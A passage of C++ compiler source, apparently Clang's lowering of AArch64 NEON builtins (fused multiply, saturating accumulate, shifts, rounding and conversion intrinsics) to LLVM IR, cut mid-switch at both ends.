case NEON::BI__builtin_neon_vdivh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFDiv(Ops[0], Ops[1], "vdivh");
case NEON::BI__builtin_neon_vfmah_f16:
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, HalfTy,
{EmitScalarExpr(E->getArg(1)), EmitScalarExpr(E->getArg(2)), Ops[0]});
case NEON::BI__builtin_neon_vfmsh_f16: {
// FIXME: This should be an fneg instruction:
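    // Fused multiply-subtract is expressed by negating the first
    // multiplicand and reusing fma: vfmsh_f16(a, b, c) computes
    // fma(-b, c, a), i.e. a - b * c with a single rounding.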
Value *Zero = llvm::ConstantFP::getZeroValueForNegation(HalfTy);
    Value *Sub =
        Builder.CreateFSub(Zero, EmitScalarExpr(E->getArg(1)), "vsubh");
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, HalfTy,
{Sub, EmitScalarExpr(E->getArg(2)), Ops[0]});
}
case NEON::BI__builtin_neon_vaddd_s64:
case NEON::BI__builtin_neon_vaddd_u64:
return Builder.CreateAdd(Ops[0], EmitScalarExpr(E->getArg(1)), "vaddd");
case NEON::BI__builtin_neon_vsubd_s64:
case NEON::BI__builtin_neon_vsubd_u64:
return Builder.CreateSub(Ops[0], EmitScalarExpr(E->getArg(1)), "vsubd");
case NEON::BI__builtin_neon_vqdmlalh_s16:
case NEON::BI__builtin_neon_vqdmlslh_s16: {
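    // Note: sqdmull has no scalar i16 form, so the i16 operands are wrapped
    // into v4i16 vectors (vectorWrapScalar16), the vector sqdmull is called,
    // and lane 0 of the v4i32 result is extracted for the saturating
    // accumulate.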
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(vectorWrapScalar16(Ops[1]));
ProductOps.push_back(vectorWrapScalar16(EmitScalarExpr(E->getArg(2))));
auto *VTy = llvm::FixedVectorType::get(Int32Ty, 4);
Ops[1] = EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmull, VTy),
ProductOps, "vqdmlXl");
Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[1] = Builder.CreateExtractElement(Ops[1], CI, "lane0");
unsigned AccumInt = BuiltinID == NEON::BI__builtin_neon_vqdmlalh_s16
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccumInt, Int32Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqshlud_n_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[1] = Builder.CreateZExt(Ops[1], Int64Ty);
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqshlu, Int64Ty),
Ops, "vqshlu_n");
}
case NEON::BI__builtin_neon_vqshld_n_u64:
case NEON::BI__builtin_neon_vqshld_n_s64: {
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vqshld_n_u64
? Intrinsic::aarch64_neon_uqshl
: Intrinsic::aarch64_neon_sqshl;
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[1] = Builder.CreateZExt(Ops[1], Int64Ty);
return EmitNeonCall(CGM.getIntrinsic(Int, Int64Ty), Ops, "vqshl_n");
}
case NEON::BI__builtin_neon_vrshrd_n_u64:
case NEON::BI__builtin_neon_vrshrd_n_s64: {
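    // Note: there is no rounding-shift-right intrinsic, so the constant
    // shift amount is negated and the rounding shift *left* intrinsic is
    // used instead, e.g. vrshrd_n_s64(x, 3) becomes srshl(x, -3).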
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vrshrd_n_u64
? Intrinsic::aarch64_neon_urshl
: Intrinsic::aarch64_neon_srshl;
Ops.push_back(EmitScalarExpr(E->getArg(1)));
int SV = cast<ConstantInt>(Ops[1])->getSExtValue();
Ops[1] = ConstantInt::get(Int64Ty, -SV);
return EmitNeonCall(CGM.getIntrinsic(Int, Int64Ty), Ops, "vrshr_n");
}
case NEON::BI__builtin_neon_vrsrad_n_u64:
case NEON::BI__builtin_neon_vrsrad_n_s64: {
unsigned Int = BuiltinID == NEON::BI__builtin_neon_vrsrad_n_u64
? Intrinsic::aarch64_neon_urshl
: Intrinsic::aarch64_neon_srshl;
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops.push_back(Builder.CreateNeg(EmitScalarExpr(E->getArg(2))));
Ops[1] = Builder.CreateCall(CGM.getIntrinsic(Int, Int64Ty),
{Ops[1], Builder.CreateSExt(Ops[2], Int64Ty)});
return Builder.CreateAdd(Ops[0], Builder.CreateBitCast(Ops[1], Int64Ty));
}
case NEON::BI__builtin_neon_vshld_n_s64:
case NEON::BI__builtin_neon_vshld_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
return Builder.CreateShl(
Ops[0], ConstantInt::get(Int64Ty, Amt->getZExtValue()), "shld_n");
}
case NEON::BI__builtin_neon_vshrd_n_s64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
return Builder.CreateAShr(
Ops[0], ConstantInt::get(Int64Ty, std::min(static_cast<uint64_t>(63),
Amt->getZExtValue())),
"shrd_n");
}
case NEON::BI__builtin_neon_vshrd_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
uint64_t ShiftAmt = Amt->getZExtValue();
// Right-shifting an unsigned value by its size yields 0.
if (ShiftAmt == 64)
return ConstantInt::get(Int64Ty, 0);
return Builder.CreateLShr(Ops[0], ConstantInt::get(Int64Ty, ShiftAmt),
"shrd_n");
}
case NEON::BI__builtin_neon_vsrad_n_s64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(2)));
Ops[1] = Builder.CreateAShr(
Ops[1], ConstantInt::get(Int64Ty, std::min(static_cast<uint64_t>(63),
Amt->getZExtValue())),
"shrd_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
}
case NEON::BI__builtin_neon_vsrad_n_u64: {
llvm::ConstantInt *Amt = cast<ConstantInt>(EmitScalarExpr(E->getArg(2)));
uint64_t ShiftAmt = Amt->getZExtValue();
// Right-shifting an unsigned value by its size yields 0.
// As Op + 0 = Op, return Ops[0] directly.
if (ShiftAmt == 64)
return Ops[0];
Ops[1] = Builder.CreateLShr(Ops[1], ConstantInt::get(Int64Ty, ShiftAmt),
"shrd_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
}
case NEON::BI__builtin_neon_vqdmlalh_lane_s16:
case NEON::BI__builtin_neon_vqdmlalh_laneq_s16:
case NEON::BI__builtin_neon_vqdmlslh_lane_s16:
case NEON::BI__builtin_neon_vqdmlslh_laneq_s16: {
Ops[2] = Builder.CreateExtractElement(Ops[2], EmitScalarExpr(E->getArg(3)),
"lane");
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(vectorWrapScalar16(Ops[1]));
ProductOps.push_back(vectorWrapScalar16(Ops[2]));
auto *VTy = llvm::FixedVectorType::get(Int32Ty, 4);
Ops[1] = EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmull, VTy),
ProductOps, "vqdmlXl");
Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[1] = Builder.CreateExtractElement(Ops[1], CI, "lane0");
Ops.pop_back();
unsigned AccInt = (BuiltinID == NEON::BI__builtin_neon_vqdmlalh_lane_s16 ||
BuiltinID == NEON::BI__builtin_neon_vqdmlalh_laneq_s16)
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccInt, Int32Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqdmlals_s32:
case NEON::BI__builtin_neon_vqdmlsls_s32: {
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(Ops[1]);
ProductOps.push_back(EmitScalarExpr(E->getArg(2)));
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmulls_scalar),
ProductOps, "vqdmlXl");
unsigned AccumInt = BuiltinID == NEON::BI__builtin_neon_vqdmlals_s32
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccumInt, Int64Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vqdmlals_lane_s32:
case NEON::BI__builtin_neon_vqdmlals_laneq_s32:
case NEON::BI__builtin_neon_vqdmlsls_lane_s32:
case NEON::BI__builtin_neon_vqdmlsls_laneq_s32: {
Ops[2] = Builder.CreateExtractElement(Ops[2], EmitScalarExpr(E->getArg(3)),
"lane");
SmallVector<Value *, 2> ProductOps;
ProductOps.push_back(Ops[1]);
ProductOps.push_back(Ops[2]);
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_sqdmulls_scalar),
ProductOps, "vqdmlXl");
Ops.pop_back();
unsigned AccInt = (BuiltinID == NEON::BI__builtin_neon_vqdmlals_lane_s32 ||
BuiltinID == NEON::BI__builtin_neon_vqdmlals_laneq_s32)
? Intrinsic::aarch64_neon_sqadd
: Intrinsic::aarch64_neon_sqsub;
return EmitNeonCall(CGM.getIntrinsic(AccInt, Int64Ty), Ops, "vqdmlXl");
}
case NEON::BI__builtin_neon_vget_lane_bf16:
case NEON::BI__builtin_neon_vduph_lane_bf16:
case NEON::BI__builtin_neon_vduph_lane_f16: {
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
}
case NEON::BI__builtin_neon_vgetq_lane_bf16:
case NEON::BI__builtin_neon_vduph_laneq_bf16:
case NEON::BI__builtin_neon_vduph_laneq_f16: {
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
}
case AArch64::BI_InterlockedAdd: {
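    // Note: atomicrmw returns the value the memory held *before* the
    // update, while _InterlockedAdd returns the new value, hence the extra
    // add of Arg1 to the atomicrmw result below.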
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
AtomicRMWInst *RMWI = Builder.CreateAtomicRMW(
AtomicRMWInst::Add, Arg0, Arg1,
llvm::AtomicOrdering::SequentiallyConsistent);
return Builder.CreateAdd(RMWI, Arg1);
}
}
llvm::FixedVectorType *VTy = GetNeonType(this, Type);
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
// Not all intrinsics handled by the common case work for AArch64 yet, so only
// defer to common code if it's been added to our special map.
Builtin = findARMVectorIntrinsicInMap(AArch64SIMDIntrinsicMap, BuiltinID,
AArch64SIMDIntrinsicsProvenSorted);
if (Builtin)
return EmitCommonNeonBuiltinExpr(
Builtin->BuiltinID, Builtin->LLVMIntrinsic, Builtin->AltLLVMIntrinsic,
Builtin->NameHint, Builtin->TypeModifier, E, Ops,
/*never use addresses*/ Address::invalid(), Address::invalid(), Arch);
if (Value *V = EmitAArch64TblBuiltinExpr(*this, BuiltinID, E, Ops, Arch))
return V;
unsigned Int;
switch (BuiltinID) {
default: return nullptr;
case NEON::BI__builtin_neon_vbsl_v:
case NEON::BI__builtin_neon_vbslq_v: {
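    // Note: vbsl is a per-bit select on the integer view of the operands:
    //   result = (sel & a) | (~sel & b)
    // i.e. each result bit comes from the second operand where the selector
    // bit is set and from the third operand where it is clear.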
llvm::Type *BitTy = llvm::VectorType::getInteger(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], BitTy, "vbsl");
Ops[1] = Builder.CreateBitCast(Ops[1], BitTy, "vbsl");
Ops[2] = Builder.CreateBitCast(Ops[2], BitTy, "vbsl");
Ops[1] = Builder.CreateAnd(Ops[0], Ops[1], "vbsl");
Ops[2] = Builder.CreateAnd(Builder.CreateNot(Ops[0]), Ops[2], "vbsl");
Ops[0] = Builder.CreateOr(Ops[1], Ops[2], "vbsl");
return Builder.CreateBitCast(Ops[0], Ty);
}
case NEON::BI__builtin_neon_vfma_lane_v:
case NEON::BI__builtin_neon_vfmaq_lane_v: { // Only used for FP types
// The ARM builtins (and instructions) have the addend as the first
// operand, but the 'fma' intrinsics have it last. Swap it around here.
Value *Addend = Ops[0];
Value *Multiplicand = Ops[1];
Value *LaneSource = Ops[2];
Ops[0] = Multiplicand;
Ops[1] = LaneSource;
Ops[2] = Addend;
// Now adjust things to handle the lane access.
auto *SourceTy = BuiltinID == NEON::BI__builtin_neon_vfmaq_lane_v
? llvm::FixedVectorType::get(VTy->getElementType(),
VTy->getNumElements() / 2)
: VTy;
llvm::Constant *cst = cast<Constant>(Ops[3]);
Value *SV = llvm::ConstantVector::getSplat(VTy->getElementCount(), cst);
Ops[1] = Builder.CreateBitCast(Ops[1], SourceTy);
Ops[1] = Builder.CreateShuffleVector(Ops[1], Ops[1], SV, "lane");
Ops.pop_back();
Int = Builder.getIsFPConstrained() ? Intrinsic::experimental_constrained_fma
: Intrinsic::fma;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "fmla");
}
case NEON::BI__builtin_neon_vfma_laneq_v: {
auto *VTy = cast<llvm::FixedVectorType>(Ty);
// v1f64 fma should be mapped to Neon scalar f64 fma
if (VTy && VTy->getElementType() == DoubleTy) {
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Ops[1] = Builder.CreateBitCast(Ops[1], DoubleTy);
llvm::FixedVectorType *VTy =
GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, true));
Ops[2] = Builder.CreateBitCast(Ops[2], VTy);
Ops[2] = Builder.CreateExtractElement(Ops[2], Ops[3], "extract");
      Value *Result = emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma,
DoubleTy, {Ops[1], Ops[2], Ops[0]});
return Builder.CreateBitCast(Result, Ty);
}
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
auto *STy = llvm::FixedVectorType::get(VTy->getElementType(),
VTy->getNumElements() * 2);
Ops[2] = Builder.CreateBitCast(Ops[2], STy);
Value *SV = llvm::ConstantVector::getSplat(VTy->getElementCount(),
cast<ConstantInt>(Ops[3]));
Ops[2] = Builder.CreateShuffleVector(Ops[2], Ops[2], SV, "lane");
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[2], Ops[1], Ops[0]});
}
case NEON::BI__builtin_neon_vfmaq_laneq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[2] = EmitNeonSplat(Ops[2], cast<ConstantInt>(Ops[3]));
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[2], Ops[1], Ops[0]});
}
case NEON::BI__builtin_neon_vfmah_lane_f16:
case NEON::BI__builtin_neon_vfmas_lane_f32:
case NEON::BI__builtin_neon_vfmah_laneq_f16:
case NEON::BI__builtin_neon_vfmas_laneq_f32:
case NEON::BI__builtin_neon_vfmad_lane_f64:
case NEON::BI__builtin_neon_vfmad_laneq_f64: {
Ops.push_back(EmitScalarExpr(E->getArg(3)));
llvm::Type *Ty = ConvertType(E->getCallReturnType(getContext()));
Ops[2] = Builder.CreateExtractElement(Ops[2], Ops[3], "extract");
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[1], Ops[2], Ops[0]});
}
case NEON::BI__builtin_neon_vmull_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umull : Intrinsic::aarch64_neon_smull;
if (Type.isPoly()) Int = Intrinsic::aarch64_neon_pmull;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmull");
case NEON::BI__builtin_neon_vmax_v:
case NEON::BI__builtin_neon_vmaxq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umax : Intrinsic::aarch64_neon_smax;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmax;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmax");
case NEON::BI__builtin_neon_vmaxh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fmax;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmax");
}
case NEON::BI__builtin_neon_vmin_v:
case NEON::BI__builtin_neon_vminq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umin : Intrinsic::aarch64_neon_smin;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmin;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmin");
case NEON::BI__builtin_neon_vminh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fmin;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmin");
}
case NEON::BI__builtin_neon_vabd_v:
case NEON::BI__builtin_neon_vabdq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_uabd : Intrinsic::aarch64_neon_sabd;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fabd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vabd");
case NEON::BI__builtin_neon_vpadal_v:
case NEON::BI__builtin_neon_vpadalq_v: {
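    // Note: pairwise add-and-accumulate is split into a pairwise widening
    // add (saddlp/uaddlp) of the vector operand followed by a plain vector
    // add of the accumulator; the backend can fold this back into
    // SADALP/UADALP.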
unsigned ArgElts = VTy->getNumElements();
llvm::IntegerType *EltTy = cast<IntegerType>(VTy->getElementType());
unsigned BitWidth = EltTy->getBitWidth();
auto *ArgTy = llvm::FixedVectorType::get(
llvm::IntegerType::get(getLLVMContext(), BitWidth / 2), 2 * ArgElts);
    llvm::Type *Tys[2] = { VTy, ArgTy };
Int = usgn ? Intrinsic::aarch64_neon_uaddlp : Intrinsic::aarch64_neon_saddlp;
    SmallVector<llvm::Value *, 1> TmpOps;
TmpOps.push_back(Ops[1]);
Function *F = CGM.getIntrinsic(Int, Tys);
llvm::Value *tmp = EmitNeonCall(F, TmpOps, "vpadal");
llvm::Value *addend = Builder.CreateBitCast(Ops[0], tmp->getType());
return Builder.CreateAdd(tmp, addend);
}
case NEON::BI__builtin_neon_vpmin_v:
case NEON::BI__builtin_neon_vpminq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_uminp : Intrinsic::aarch64_neon_sminp;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fminp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmin");
case NEON::BI__builtin_neon_vpmax_v:
case NEON::BI__builtin_neon_vpmaxq_v:
// FIXME: improve sharing scheme to cope with 3 alternative LLVM intrinsics.
Int = usgn ? Intrinsic::aarch64_neon_umaxp : Intrinsic::aarch64_neon_smaxp;
if (Ty->isFPOrFPVectorTy()) Int = Intrinsic::aarch64_neon_fmaxp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmax");
case NEON::BI__builtin_neon_vminnm_v:
case NEON::BI__builtin_neon_vminnmq_v:
Int = Intrinsic::aarch64_neon_fminnm;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vminnm");
case NEON::BI__builtin_neon_vminnmh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fminnm;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vminnm");
case NEON::BI__builtin_neon_vmaxnm_v:
case NEON::BI__builtin_neon_vmaxnmq_v:
Int = Intrinsic::aarch64_neon_fmaxnm;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmaxnm");
case NEON::BI__builtin_neon_vmaxnmh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Int = Intrinsic::aarch64_neon_fmaxnm;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmaxnm");
case NEON::BI__builtin_neon_vrecpss_f32: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, FloatTy),
Ops, "vrecps");
}
case NEON::BI__builtin_neon_vrecpsd_f64:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, DoubleTy),
Ops, "vrecps");
case NEON::BI__builtin_neon_vrecpsh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, HalfTy),
Ops, "vrecps");
case NEON::BI__builtin_neon_vqshrun_n_v:
Int = Intrinsic::aarch64_neon_sqshrun;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrun_n");
case NEON::BI__builtin_neon_vqrshrun_n_v:
Int = Intrinsic::aarch64_neon_sqrshrun;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrun_n");
case NEON::BI__builtin_neon_vqshrn_n_v:
Int = usgn ? Intrinsic::aarch64_neon_uqshrn : Intrinsic::aarch64_neon_sqshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrn_n");
case NEON::BI__builtin_neon_vrshrn_n_v:
Int = Intrinsic::aarch64_neon_rshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrshrn_n");
case NEON::BI__builtin_neon_vqrshrn_n_v:
Int = usgn ? Intrinsic::aarch64_neon_uqrshrn : Intrinsic::aarch64_neon_sqrshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrn_n");
case NEON::BI__builtin_neon_vrndah_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrnda");
}
case NEON::BI__builtin_neon_vrnda_v:
case NEON::BI__builtin_neon_vrndaq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnda");
}
case NEON::BI__builtin_neon_vrndih_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_nearbyint
: Intrinsic::nearbyint;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndi");
}
case NEON::BI__builtin_neon_vrndmh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndm");
}
case NEON::BI__builtin_neon_vrndm_v:
case NEON::BI__builtin_neon_vrndmq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndm");
}
case NEON::BI__builtin_neon_vrndnh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndn_v:
case NEON::BI__builtin_neon_vrndnq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndns_f32: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, FloatTy), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndph_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndp");
}
case NEON::BI__builtin_neon_vrndp_v:
case NEON::BI__builtin_neon_vrndpq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndp");
}
case NEON::BI__builtin_neon_vrndxh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndx");
}
case NEON::BI__builtin_neon_vrndx_v:
case NEON::BI__builtin_neon_vrndxq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndx");
}
case NEON::BI__builtin_neon_vrndh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndz");
}
case NEON::BI__builtin_neon_vrnd32x_v:
case NEON::BI__builtin_neon_vrnd32xq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint32x;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd32x");
}
case NEON::BI__builtin_neon_vrnd32z_v:
case NEON::BI__builtin_neon_vrnd32zq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint32z;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd32z");
}
case NEON::BI__builtin_neon_vrnd64x_v:
case NEON::BI__builtin_neon_vrnd64xq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint64x;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd64x");
}
case NEON::BI__builtin_neon_vrnd64z_v:
case NEON::BI__builtin_neon_vrnd64zq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint64z;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd64z");
}
case NEON::BI__builtin_neon_vrnd_v:
case NEON::BI__builtin_neon_vrndq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndz");
}
case NEON::BI__builtin_neon_vcvt_f64_v:
case NEON::BI__builtin_neon_vcvtq_f64_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, quad));
return usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_f64_f32: {
assert(Type.getEltType() == NeonTypeFlags::Float64 && quad &&
"unexpected vcvt_f64_f32 builtin");
NeonTypeFlags SrcFlag = NeonTypeFlags(NeonTypeFlags::Float32, false, false);
Ops[0] = Builder.CreateBitCast(Ops[0], GetNeonType(this, SrcFlag));
return Builder.CreateFPExt(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvt_f32_f64: {
assert(Type.getEltType() == NeonTypeFlags::Float32 &&
"unexpected vcvt_f32_f64 builtin");
NeonTypeFlags SrcFlag = NeonTypeFlags(NeonTypeFlags::Float64, false, true);
Ops[0] = Builder.CreateBitCast(Ops[0], GetNeonType(this, SrcFlag));
return Builder.CreateFPTrunc(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvt_s32_v:
case NEON::BI__builtin_neon_vcvt_u32_v:
case NEON::BI__builtin_neon_vcvt_s64_v:
case NEON::BI__builtin_neon_vcvt_u64_v:
case NEON::BI__builtin_neon_vcvt_s16_v:
case NEON::BI__builtin_neon_vcvt_u16_v:
case NEON::BI__builtin_neon_vcvtq_s32_v:
case NEON::BI__builtin_neon_vcvtq_u32_v:
case NEON::BI__builtin_neon_vcvtq_s64_v:
case NEON::BI__builtin_neon_vcvtq_u64_v:
case NEON::BI__builtin_neon_vcvtq_s16_v:
case NEON::BI__builtin_neon_vcvtq_u16_v: {
Int =
usgn ? Intrinsic::aarch64_neon_fcvtzu : Intrinsic::aarch64_neon_fcvtzs;
llvm::Type *Tys[2] = {Ty, GetFloatNeonType(this, Type)};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtz");
}
case NEON::BI__builtin_neon_vcvta_s16_v:
case NEON::BI__builtin_neon_vcvta_u16_v:
